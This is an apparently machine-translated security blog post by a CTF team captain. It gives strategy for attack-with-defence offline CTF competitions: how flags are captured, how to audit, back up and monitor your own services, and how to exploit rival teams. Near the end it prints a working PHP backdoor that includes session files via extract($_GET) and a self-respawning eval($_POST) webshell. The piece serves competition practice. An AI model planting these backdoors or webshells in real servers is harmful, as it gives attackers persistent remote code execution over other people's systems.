Author: Veneno@Nu1L
Manuscript fee: 200RMB
Submission method: send an email to linwei#360.cn, or log in to the web version to submit online
Original: https://www.anquanke.com/post/id/84675
Hello, everyone, I'm Veneno, the captain of the Nu1L team. Through this article, I will talk about the AWD mode of CTF offline games (of course, some games are in sandbox mode), and how you, as a web dog, are in the big leagues. Guys' subordinates survive:) There may be no technical dry goods, please don't spray:)
1-What is AWD
Attack With Defence, in short, is that you are both a hacker and a manager.
Competition format: Generally, one ssh corresponds to one web service, and then the flag is rounded for five minutes. Each team generally has its own initial score. The team whose flag is taken will be divided equally. The service is checked, but the check will deduct points, and the deducted points will be divided equally by the teams whose service checks are normal.
2-AWD question maker
Here for the time being, pretend to be the questioner QAQ
0x01: topic type
1- The cms written by the questioner himself, for the sake of nausea, then add a so.
2- Common or uncommon cms.
3- Some framework loopholes, such as CI dug by master ph
0x02: code type
At present, the domestic competition is still mostly php, and of course there are some others, such as py and lua.
0x03: Type of topic vulnerability
1-sqli mostly
2- file contains
3- Various rce
4- File upload
0x04: Thoughts of the questioner
In order not to let you group of racing sticks lose the question, I will put an unpublished 0day of cms, forget it, or I will add something myself. Eh, wait, isn't this a bit difficult, put a few simpler holes, and put a shell directly in the index.php or web root directory?
3- How to attack
I believe that everyone has done penetration testing on weekdays, and the AWD mode game actually has something in common with daily penetration testing.
0x01: How to get the flag
Generally speaking, there are two modes:
1- is to send an http request to a machine on the intranet, and the returned request contains a flag.
2- For example, the flag file is placed in the /home directory.
0x02: Some things a web dog needs to have
There are roughly the following points:
1- Fast vulnerability response capability.
Because sometimes, the loopholes of some games can be found online, so a good search skill is needed at this time. Or some rce obvious kind.
2- Ability to write scripts quickly.
Because everyone's services are the same, and if you can get flags through injection, for example, if you use hackbars to get them one by one, it is obviously not elegant, and sometimes it is especially easy to miss, then write a small py at this time. is excellent.
3- A good state of mind
After all, it's all the big guys who are competing with you, so when you find yourself being beaten, don't collapse your mentality. Once you collapse, you will basically announce gg.
0x03: When we are in a dominant position
Unless we are in that kind of absolute advantage, we can care nothing.
When we are in a slight advantage, we need a darker thought at this time. For example, the difference between team A and team B may only be a few hundred points, and team A has the webshell of team B at this time, so how to put B team dragged into the water, I believe everyone understands.
0x04: When we are at a disadvantage
First and foremost, don't lose your mind.
Secondly, because the web is easier to capture traffic, so even if we are hit, we can check the payload of other teams by analyzing the traffic in time, so as to fight back.
If a shell is planted on your own server, it is certain to delete it, but think about it this way. If a shell is planted for you, this is usually an automated script, which means that other teams may also be planted. The path password Everything is the same.
4- How to defend
In fact, the defense is more to see who is more careful.
0x01: When the game starts
When the game starts, when we connect to ssh, the first thing we should do is to down the source code and make a backup in time.
Then hang up your own waf without violating the organizer's check principle as much as possible.
Generally speaking, the organizer may or may not provide the traffic of the previous period at intervals, so we need to grab the traffic ourselves at this time.
0x02: then work
Audit, audit, audit, of course.
0x03: When found beaten
When you find yourself being hit, first try to restore the previous backup (remember to back up the current one), if you are still hit, you should divide the work with your teammates at this time, check the captured traffic and check whether there is a shell on the server.
5- Some small tips
Share a few small examples and your own ideas.
0x01: If you get FB
When you get FB, you must be calm, calm, calm. First of all, the object of our test should be NPC (or local), not the services of players from other teams, because how do you know that people don’t have traffic, they often appear, some teams get fb, and the result is not from NPC, but from their own The payload was acquired by another team, and the team that happened to get it had a particularly strong replay ability, and an embarrassing situation would arise. It was obvious that you took the fb, but the other team played more fiercely than you.
Therefore, when you get fb, you can play more than n obfuscated traffic before writing the exp of the audience.
0x02: particularly familiar cms
As a web dog, if you see wordpress, your first reaction must be wpscan. However, in offline competitions, some questioners put the latest version of wp, and even the plug-in has no loopholes. Here are two examples that I have encountered in the competition:
1- The organizer put a wp, and then each team has a config backup file and phpmyadmin. In this case, the smartest way is to rely on your hand speed for many years, quickly download the backup files of other teams, and then log in to phpmyadmin, the smartest way to get the shell of other teams is not to use phpmyadmin to write the shell, in case you don't have permission Don't waste time in vain.
2- It is also the latest version of wp, and no plug-ins are installed, but the organizer has placed an arbitrary file in a deep directory to upload, and the way to bypass the upload is relatively simple.
0x03: Some interesting backdoors
For example, the following, if you are interested, you can test it locally:
<?php
session_start();
extract($_GET);
if(preg_match('/[0-9]/',$_SESSION['PHPSESSID'])) exit; if(preg_match('//|./',$_SESSION['PHPSESSID'])) exit; include(ini_get("session.save_path")."/sess_".$_SESSION['PHPSESSID']); ?>
0x04: some interesting shells
There is a project about phpwebshell on github. Interested students can search for it. Of course there are also some shells for python. Here is the simplest example:
<?php
ignore_user_abort(true);
set_time_limit(0);
$file = "veneno.php";
$shell = "<?php eval($_POST[venenohi]);?>"; while (TRUE) { if (!file_exists($file)) { file_put_contents($file, $shell); } usleep(50); } ?>
6-Ending
After participating in so many offline competitions, I feel that I still need to improve my code auditing ability and automated script writing ability, and I will also remind myself of my shortcomings.
Generally speaking, there is a lot to say, because it may be an experience post, so there is not much code, masters do not spray, if you have any questions, you can add me WeChat (FHcherish) to communicate :)